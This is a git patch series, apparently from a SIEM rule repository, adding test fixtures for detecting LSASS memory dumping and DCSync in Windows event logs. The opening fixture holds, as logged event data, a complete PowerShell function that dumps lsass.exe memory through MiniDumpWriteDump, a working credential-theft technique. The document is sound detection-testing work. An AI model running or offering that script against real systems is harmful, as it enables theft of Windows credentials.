files. for example, a partial dump will be written # in the case when 32-bit powershell tries to dump a 64-bit process. remove-item $processdumppath -erroraction silentlycontinue throw $exceptionmessage } else { \"memdump complete!\" } }", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: LSASS Memory", "correlation_name": "Credentials_MiniDumpWriteDump_Lsass", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Credentials_MiniDumpWriteDump_Lsass|msedgewin10|S-1-5-21-3461203602-4096304019-2269080069-1000|", "incident.category": "DataLeakage", "incident.severity": "high", "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.fullpath": "C:\\Users\\Public\\lsass_wer_ps.ps1", "object.name": "lsass_wer_ps.ps1", "object.path": "C:\\Users\\Public\\", "object.process.cmdline": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "object.process.id": "7008", "object.value": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000"} \ No newline at end of file From 41cfcfd817490fc4b8006d756387c5c02a066128 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 14:01:26 +0300 Subject: [PATCH 05/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(DCSync)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_cred_access/DCSync/tests/test_1.sc | 4 ++++ .../mitre_attck_cred_access/DCSync/tests/test_2.sc | 4 ++++ .../mitre_attck_cred_access/DCSync/tests/test_3.sc | 5 +++++ .../mitre_attck_cred_access/DCSync/tests/test_4.sc | 4 ++++ .../mitre_attck_cred_access/DCSync/tests/test_5.sc | 4 ++++ .../mitre_attck_cred_access/DCSync/tests/test_6.sc | 4 ++++ 6 files changed, 25 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc new file mode 100644 index 00000000..3ecaf22a --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T02:10:43.4872170Z\"},\"EventRecordID\":\"202793\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"4632\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40c6511\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "c6faf700-bfe4-452a-a766-424f84c29583", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:01:13.936Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T02:10:43.487Z", "type": "raw", "uuid": "692df50e-ed9b-402b-b6ff-fd8bc988fb6b"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|dc1.insecurebank.local|administrator", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc new file mode 100644 index 00000000..46dd6b84 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T02:10:43.4872170Z\"},\"EventRecordID\":\"202792\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"4632\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40c6511\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "c6faf700-bfe4-452a-a766-424f84c29583", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:04:28.295Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T02:10:43.487Z", "type": "raw", "uuid": "03448835-b4b4-45de-b26a-063bc09f0e3b"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|dc1.insecurebank.local|administrator", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc new file mode 100644 index 00000000..15174cf6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc @@ -0,0 +1,5 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T02:10:43.4872170Z\"},\"EventRecordID\":\"202791\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"4632\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40c6511\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "c6faf700-bfe4-452a-a766-424f84c29583", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:13:38.695Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T02:10:43.487Z", "type": "raw", "uuid": "3f90421b-c6b0-48a7-bc47-94ea9c013212"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|dc1.insecurebank.local|administrator", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169"} + diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc new file mode 100644 index 00000000..fe2d713d --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T19:35:22.922876700Z\"},\"EventRecordID\":\"102112090\",\"Correlation\":{\"ActivityID\":\"{0BEB71D4-90D6-43F9-A57E-CE8CF1C42913}\"},\"Execution\":{\"ProcessID\":\"572\",\"ThreadID\":\"8132\"},\"Channel\":\"Security\",\"Computer\":\"ecsb003006a9.dc.atomic.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"ECSB003006A9$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"DC\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x164d623881\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{b5f76dbe-2a2e-4625-ab2a-66c5d1c71765}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "ecsb003006a9.dc.atomic.local", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "b5f76dbe-2a2e-4625-ab2a-66c5d1c71765", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:43:33.529Z", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T19:35:22.922Z", "type": "raw", "uuid": "90de9227-1ba6-4678-aa7a-521819d549a3"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|ecsb003006a9.dc.atomic.local|ecsb003006a9$", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc new file mode 100644 index 00000000..e464f5ba --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T19:35:22.922776200Z\"},\"EventRecordID\":\"102112089\",\"Correlation\":{\"ActivityID\":\"{4B14F9AC-0BA9-4809-8483-1083DDB10886}\"},\"Execution\":{\"ProcessID\":\"572\",\"ThreadID\":\"8132\"},\"Channel\":\"Security\",\"Computer\":\"ecsb003006a9.dc.atomic.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"ECSB003006A9$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"DC\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x164d623881\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{b5f76dbe-2a2e-4625-ab2a-66c5d1c71765}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "ecsb003006a9.dc.atomic.local", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "b5f76dbe-2a2e-4625-ab2a-66c5d1c71765", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:44:22.248Z", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T19:35:22.922Z", "type": "raw", "uuid": "ac227de2-f782-45d9-b886-7dd62483bc2f"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|ecsb003006a9.dc.atomic.local|ecsb003006a9$", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc new file mode 100644 index 00000000..edc5c5a7 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": 